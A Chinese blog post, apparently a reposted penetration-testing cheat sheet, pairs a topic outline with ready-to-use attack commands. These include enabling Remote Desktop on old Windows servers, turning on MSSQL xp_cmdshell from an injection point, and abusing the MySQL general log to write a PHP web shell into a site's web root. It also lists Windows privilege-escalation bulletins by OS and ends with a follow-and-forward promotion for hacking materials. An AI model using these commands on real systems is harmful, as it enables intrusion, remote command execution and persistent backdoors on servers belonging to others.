飞道的博客

暴力干货!2021最新渗透测试知识点大总结(收藏这篇就够了)

207人阅读  评论(0)

直接上货!

 

核心:

1.web安全

2.二进制安全(包括逆向工程和漏洞利用)

3.密码学知识

 

其他基础:

1.软件开发

2.数据库原理

3.编程语言

4.计算机取证分析和隐写术

5.网络协议及网络算法

6.算法与数据结构

7.研究开源工具的基本原理,懂得自制工具

 

Web安全:

1.注入类:SQL注入;XSS跨站脚本攻击;XXE;命令执行~命令注入(bash);文件上传~文件下载

2.信息漏洞:源码泄露;敏感信息接口;员工资料泄露;服务器信息泄露

3.逻辑类:权限绕过;条件竞争;数据篡改

 

网站工作原理:HTTP协议;Webserver

 

HTTP协议构成:

1.http-header构成(request response)

2.http-body 构成(request response)

3.http方法

 

Webserver:

1.Webserver分类

2.Webserver解析流程

3.Webserver基础安全

 

编程语言:

前端:html,css,javascript

后台和脚本语言:php,java,python

 

数据库原理:

关系型数据库(MySQL)和非关系型数据库

 

逆向工程:

1.体系结构:机器指令和汇编语言

2.编译原理:自动机,词法分析,语法分析

3.操作系统:系统的加载与引导

4.计算机组成原理

 

漏洞挖掘与利用:

1.逆向工程

2.模糊测试

3.什么是漏洞

4.程序员在什么时候会犯错

5.信息收集工具:端口,子域名,代码泄露,员工字典

6.数据包抓取修改重放工具

7.顺手的浏览器及插件(火狐Hackbar)

8.VPS,漏洞验证

9.分析业务功能

10.分析web架构

11.针对性的罗列可能的漏洞类型

12.详细测试:不放过任何一个数据包

13.单一利用:Getshell;敏感信息接口

14.组合利用:XSS+CSRF

 

密码学:

1.古典密码学:凯撒密码;移位密码

2.现代密码学:对称加密体系(DES;AES)和非对称加密体系(RSA)
 

Win2003

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Win2003,WinXP

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Mssql开启xp_cmdshell

关闭命令


  
  1. EXEC sp_configure ' show advanced options ', 1; //显示或修改高级选项
  2. RECONFIGURE;
  3. EXEC sp_configure 'xp_cmdshell ',0;
  4. RECONFIGURE;

开启命令


  
  1. EXEC sp_configure ' show advanced options ', 1;
  2. RECONFIGURE;
  3. EXEC sp_configure 'xp_cmdshell ', 1;
  4. RECONFIGURE;

在注入点运行上述语句时,如果出现这样的回显,标记message: 配置选项 'xp_cmdshell' 不存在,可执行以下语句


  
  1. EXEC sp_configure ' show advanced options ',1;
  2. RECONFIGURE;
  3. EXEC sp_configure ' user connections ',1;
  4. RECONFIGURE;

Mysql日志拿shell


  
  1. set global general_log = on;
  2. set  global general_log_file =  'C:/phpStudy/WWW/sinight.php';
  3. select  '<?php @assert($_POST["sinight"]); ?>';
  4. set global general_log = off;

Windows提权对照表


  
  1. #Security Bulletin #KB #Description #Operating System
  2. CVE-2017-0213   [Windows COM Elevation of Privilege Vulnerability]  (windows 10/ 8.1/ 7/ 2016/ 2010/ 2008)
  3. MS17-010   [KB4013389]   [Windows Kernel Mode Drivers]  (windows 7/ 2008/ 2003/XP)
  4. MS16-135   [KB3199135]   [Windows Kernel Mode Drivers]  ( 2016)
  5. MS16-098   [KB3178466]   [Kernel Driver]  (Win 8.1)
  6. MS16-075   [KB3164038]   [Hot Potato]  ( 2003/ 2008/ 7/ 8/ 2012)
  7. MS16-032   [KB3143141]   [Secondary Logon Handle]  ( 2008/ 7/ 8/ 10/ 2012)
  8. MS16-016   [KB3136041]   [WebDAV]  ( 2008/Vista/ 7)
  9. MS15-097   [KB3089656]   [remote code execution]  (win8. 1/ 2012)
  10. MS15-076   [KB3067505]   [RPC]  ( 2003/ 2008/ 7/ 8/ 2012)
  11. MS15-077   [KB3077657]   [ATM]  (XP/Vista/Win7/Win8/ 2000/ 2003/ 2008/ 2012)
  12. MS15-061   [KB3057839]   [Kernel Driver]  ( 2003/ 2008/ 7/ 8/ 2012)
  13. MS15-051   [KB3057191]   [Windows Kernel Mode Drivers]  ( 2003/ 2008/ 7/ 8/ 2012)
  14. MS15-010   [KB3036220]   [Kernel Driver]  ( 2003/ 2008/ 7/ 8)
  15. MS15-015   [KB3031432]   [Kernel Driver]  (Win7/ 8/ 8.1/ 2012/RT/ 2012 R2/ 2008 R2)
  16. MS15-001   [KB3023266]   [Kernel Driver]  ( 2008/ 2012/ 7/ 8)
  17. MS14-070   [KB2989935]   [Kernel Driver]  ( 2003)
  18. MS14-068   [KB3011780]   [Domain Privilege Escalation]  ( 2003/ 2008/ 2012/ 7/ 8)
  19. MS14-058   [KB3000061]   [Win32k.sys]  ( 2003/ 2008/ 2012/ 7/ 8)
  20. MS14-040   [KB2975684]   [AFD Driver]  ( 2003/ 2008/ 2012/ 7/ 8)
  21. MS14-002   [KB2914368]   [NDProxy]  ( 2003/XP)
  22. MS13-053   [KB2850851]   [win32k.sys]  (XP/Vista/ 2003/ 2008/win 7)
  23. MS13-046   [KB2840221]   [dxgkrnl.sys]  (Vista/ 2003/ 2008/ 2012/ 7)
  24. MS13-005   [KB2778930]   [Kernel Mode Driver]  ( 2003/ 2008/ 2012/win7/ 8)
  25. MS12-042   [KB2972621]   [Service Bus]  ( 2008/ 2012/win7)
  26. MS12-020   [KB2671387]   [RDP]  ( 2003/ 2008/ 7/XP)
  27. MS11-080   [KB2592799]   [AFD.sys]  ( 2003/XP)
  28. MS11-062   [KB2566454]   [NDISTAPI]  ( 2003/XP)
  29. MS11-046   [KB2503665]   [AFD.sys]  ( 2003/ 2008/ 7/XP)
  30. MS11-011   [KB2393802]   [kernel Driver]  ( 2003/ 2008/ 7/XP/Vista)
  31. MS10-092   [KB2305420]   [Task Scheduler]  ( 2008/ 7)
  32. MS10-065   [KB2267960]   [FastCGI]  (IIS 5.1, 6.0, 7.0, and 7.5)
  33. MS10-059   [KB982799]   [ACL-Churraskito]  ( 2008/ 7/Vista)
  34. MS10-048   [KB2160329]   [win32k.sys]  (XP SP2 & SP3/ 2003 SP2/Vista SP1 & SP2/ 2008 Gold & SP2 & R2/Win7)
  35. MS10-015   [KB977165]   [KiTrap0D]  ( 2003/ 2008/ 7/XP)
  36. MS09-050   [KB975517]   [Remote Code Execution]  ( 2008/Vista)
  37. MS09-020   [KB970483]   [IIS 6.0]  (IIS 5.1 and 6.0)
  38. MS09-012   [KB959454]   [Chimichurri]  (Vista/win7/ 2008/Vista)
  39. MS08-068   [KB957097]   [Remote Code Execution]  ( 2000/XP)
  40. MS08-067   [KB958644]   [Remote Code Execution]  (Windows 2000/XP/Server 2003/Vista/Server 2008)
  41. MS08-025   [KB941693]   [Win32.sys]  (XP/ 2003/ 2008/Vista)
  42. MS06-040   [KB921883]   [Remote Code Execution]  ( 2003/xp/ 2000)
  43. MS05-039   [KB899588]   [PnP Service]  (Win 9X/ME/NT/ 2000/XP/ 2003)
  44. MS03-026   [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/ 2000/XP/ 2003)

Win下面各种文件下载姿势<参考backlion表哥的文章以及freebuf的>

http://www.cnblogs.com/backlion/p/7908563.html
https://www.freebuf.com/articles/system/155147.html

Python开启HTTP服务

Python <= 2.3
python -c "import SimpleHTTPServer as s; s.test();" 8000
Python >= 2.4
python -m SimpleHTTPServer 8000
Python 3.x
python -m http.server 8000

各种文件上传姿势总结

https://github.com/cnnetarmy/uploadfile
https://myzxcg.github.io/20171116.html

另外为了帮助到大家更好的学习 博主在这里准备一些Kail 渗透测试的学习资料(文末领取)

内容非常详细且全面,覆盖了Web安全的方方面面,既有初学者入门的内容也有适合大牛提升的内容,包含:视频进阶教程、BATJ、360和奇安信等大厂实战项目渗透实用工具包以及Kali安全技能书籍,助你一步步成为安全圈的大牛。


 

0 基础入门部分视频

 

提升基础部分视频

 

 

渗透技能工具包

 

渗透技能书籍大全

 

渗透测试经典实操笔记

 

2021大厂热门面试题

 

 

需要这份资料的朋友请关注+转发后 私信【渗透】 免费索取

往期精彩:牛掰了!阿里大佬居然把Nmap使用技巧总结的这么好 马云看了都说叼


转载:https://blog.csdn.net/MachineGunJoe/article/details/116750372
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场